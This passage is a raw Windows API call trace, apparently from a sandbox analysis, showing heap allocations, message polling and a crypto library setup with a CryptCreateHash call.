| out: lpMsg=0x8cf708) returned 0 [0246.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0246.276] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0246.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0246.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0246.277] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55fb8 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0246.277] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0246.277] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0246.277] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0246.277] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0246.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0246.278] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0246.278] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0246.278] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0246.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0246.279] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0246.279] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b90 [0246.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0246.279] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0246.279] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0246.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0246.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0246.279] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.279] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0246.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0246.279] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0246.279] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0246.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.279] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0246.280] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.280] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0246.280] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0246.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0246.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0246.280] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.280] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0246.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0246.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0246.280] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0246.280] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0246.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0246.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0246.281] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0246.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0246.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0246.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0246.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0246.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e514a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0246.281] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0246.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0246.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0246.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0246.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0246.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0246.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0246.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0246.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0246.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0246.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0246.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0246.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0246.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0246.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0246.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0246.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0246.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0246.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0246.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0246.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0246.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0246.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0246.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0246.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0246.284] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0246.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0246.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0246.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0246.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0246.284] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0246.284] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0246.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0246.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0246.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.286] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0246.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d98 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0246.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0246.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0246.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ec8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0246.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 